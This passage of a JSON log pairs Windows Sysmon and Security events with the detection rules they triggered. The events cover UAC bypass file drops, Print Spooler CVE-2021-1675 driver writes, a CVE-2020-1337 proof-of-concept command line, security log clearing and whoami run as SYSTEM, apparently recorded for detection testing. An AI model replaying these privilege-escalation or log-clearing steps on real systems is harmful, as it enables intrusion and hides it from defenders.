","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution_attributes":{"ProcessID":1276,"ThreadID":6720},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 